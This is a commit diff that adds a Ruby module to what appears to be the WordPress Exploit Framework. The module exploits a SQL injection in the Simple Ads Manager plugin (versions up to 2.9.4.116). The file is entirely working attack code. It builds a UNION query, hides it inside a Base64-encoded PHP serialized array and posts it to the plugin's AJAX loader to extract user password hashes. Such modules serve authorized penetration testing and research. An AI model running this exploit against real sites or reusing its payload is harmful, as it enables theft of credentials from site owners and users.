Add Simple Ads Manager <= 2.9.4.116 hash dump

rastating · rastating · commit f29dfe7173fe · 2018-07-08T14:21:03.000+01:00
diff --git a/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb b/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb
@@ -0,0 +1,67 @@
+# frozen_string_literal: true
+
+require 'base64'
+
+class Wpxf::Auxiliary::SimpleAdsManagerHashDump < Wpxf::Module
+  include Wpxf::WordPress::HashDump
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Simple Ads Manager <= 2.9.4.116',
+      author: [
+        'Kacper Szurek', # Vulnerability discovery
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'],
+        ['WPVDB', '8357']
+      ],
+      date: 'Dec 30 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('simple-ads-manager', '2.9.5.118', '2.9.4.116')
+  end
+
+  def reveals_one_row_per_request
+    true
+  end
+
+  def hashdump_number_of_cols
+    23
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'simple-ads-manager', 'sam-ajax-loader.php')
+  end
+
+  def encode_query(query)
+    query = ") UNION (#{query}"
+    serialized = "a:4:{s:2:\"WC\";s:3:\"1=0\";s:3:\"WCT\";s:0:\"\";s:3:\"WCW\";s:#{query.bytesize}:\"#{query}\";s:4:\"WC2W\";s:0:\"\";}"
+    Base64.strict_encode64(serialized)
+  end
+
+  def hashdump_sql_statement
+    encode_query(super)
+  end
+
+  def hashdump_prefix_fingerprint_statement
+    encode_query(super)
+  end
+
+  def hashdump_request_body
+    {
+      'action' => 'load_place',
+      'id' => '0',
+      'pid' => '1',
+      'wc' => hashdump_sql_statement
+    }
+  end
+
+  def hashdump_request_method
+    :post
+  end
+end
